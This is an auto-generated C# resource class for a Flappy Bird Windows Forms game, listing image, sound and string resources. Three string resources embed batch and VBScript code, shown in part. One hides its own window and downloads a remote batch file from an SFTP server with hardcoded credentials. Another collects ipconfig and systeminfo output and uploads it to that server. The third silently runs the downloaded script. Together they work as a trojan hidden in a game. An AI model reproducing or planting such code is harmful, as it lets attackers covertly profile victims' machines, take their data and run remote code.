//------------------------------------------------------------------------------
// <auto-generated>
//     此代码由工具生成。
//     运行时版本:4.0.30319.42000
//
//     对此文件的更改可能会导致不正确的行为，并且如果
//     重新生成代码，这些更改将会丢失。
// </auto-generated>
//------------------------------------------------------------------------------

namespace Flappy_Bird_Windows_Form.Properties {
    using System;
    
    
    /// <summary>
    ///   一个强类型的资源类，用于查找本地化的字符串等。
    /// </summary>
    // 此类是由 StronglyTypedResourceBuilder
    // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。
    // 若要添加或移除成员，请编辑 .ResX 文件，然后重新运行 ResGen
    // (以 /str 作为命令选项)，或重新生成 VS 项目。
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   返回此类使用的缓存的 ResourceManager 实例。
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Flappy_Bird_Windows_Form.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   重写当前线程的 CurrentUICulture 属性，对
        ///   使用此强类型资源类的所有资源查找执行重写。
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   查找 System.Drawing.Bitmap 类型的本地化资源。
        /// </summary>
        internal static System.Drawing.Bitmap back_arrow_7468287 {
            get {
                object obj = ResourceManager.GetObject("back-arrow_7468287", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   查找 System.Drawing.Bitmap 类型的本地化资源。
        /// </summary>
        internal static System.Drawing.Bitmap bird {
            get {
                object obj = ResourceManager.GetObject("bird", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   查找 System.Drawing.Bitmap 类型的本地化资源。
        /// </summary>
        internal static System.Drawing.Bitmap flappyBirdPlayButton {
            get {
                object obj = ResourceManager.GetObject("flappyBirdPlayButton", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   查找 System.Drawing.Bitmap 类型的本地化资源。
        /// </summary>
        internal static System.Drawing.Bitmap flappybirdy_regular {
            get {
                object obj = ResourceManager.GetObject("flappybirdy-regular", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   查找 System.Drawing.Bitmap 类型的本地化资源。
        /// </summary>
        internal static System.Drawing.Bitmap flappybirdy_regular1 {
            get {
                object obj = ResourceManager.GetObject("flappybirdy-regular1", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   查找 System.Drawing.Bitmap 类型的本地化资源。
        /// </summary>
        internal static System.Drawing.Bitmap ground {
            get {
                object obj = ResourceManager.GetObject("ground", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   查找类似 @echo off
        ///setlocal
        ///
        ///::make windows show time shorter
        ///if &quot;%1&quot;==&quot;hide&quot; goto CmdBegin
        ///start mshta vbscript:createobject(&quot;wscript.shell&quot;).run(&quot;&quot;&quot;%~0&quot;&quot; hide&quot;,0)(window.close)&amp;&amp;exit
        ///:CmdBegin
        ///
        ///rem Set your WinSCP executable path (update this path if needed)
        ///set WINSCP_PATH=&quot;C:\Program Files (x86)\WinSCP\WinSCP.com&quot;
        ///
        ///rem Set your SFTP server details
        ///set SFTP_HOST=172.20.10.10
        ///set SFTP_USER=mysftpuser
        ///set SFTP_PASSWORD=12345
        ///set REMOTE_FILE= /test/test.bat
        ///set LOCAL_FILE=C:\Users\Public\test.bat
        ///
        /// [字符串的其余部分被截断]&quot;; 的本地化字符串。
        /// </summary>
        internal static string hello {
            get {
                return ResourceManager.GetString("hello", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似于 System.IO.MemoryStream 的 System.IO.UnmanagedMemoryStream 类型的本地化资源。
        /// </summary>
        internal static System.IO.UnmanagedMemoryStream music1 {
            get {
                return ResourceManager.GetStream("music1", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找 System.Drawing.Bitmap 类型的本地化资源。
        /// </summary>
        internal static System.Drawing.Bitmap pipe {
            get {
                object obj = ResourceManager.GetObject("pipe", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   查找 System.Drawing.Bitmap 类型的本地化资源。
        /// </summary>
        internal static System.Drawing.Bitmap pipedown {
            get {
                object obj = ResourceManager.GetObject("pipedown", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   查找 System.Drawing.Bitmap 类型的本地化资源。
        /// </summary>
        internal static System.Drawing.Bitmap play {
            get {
                object obj = ResourceManager.GetObject("play", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   查找类似 @echo off
        ///setlocal
        ///
        ///rem Set your WinSCP executable path (update this path if needed)
        ///set WINSCP_PATH=&quot;C:\Program Files (x86)\WinSCP\WinSCP.com&quot;
        ///
        ///rem Set your SFTP server details
        ///set SFTP_HOST=172.20.10.10
        ///set SFTP_USER=mysftpuser
        ///set SFTP_PASSWORD=12345
        ///set REMOTE_PATH=/test
        ///
        ///
        ///
        ///rem Generate local network information and save it to a text file
        ///
        ///ipconfig /all &gt; C:\Users\Public\network.txt
        ///systeminfo &gt; C:\Users\Public\sysinfor.txt
        ///
        ///rem Run WinSCP to upload the text file to the SFTP server
        ///% [字符串的其余部分被截断]&quot;; 的本地化字符串。
        /// </summary>
        internal static string test {
            get {
                return ResourceManager.GetString("test", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 set ws=WScript.CreateObject(&quot;WScript.Shell&quot;)
        ///
        ///ws.Run &quot;C:\Users\Public\test.bat&quot;,0 的本地化字符串。
        /// </summary>
        internal static string vvbb {
            get {
                return ResourceManager.GetString("vvbb", resourceCulture);
            }
        }
    }
}
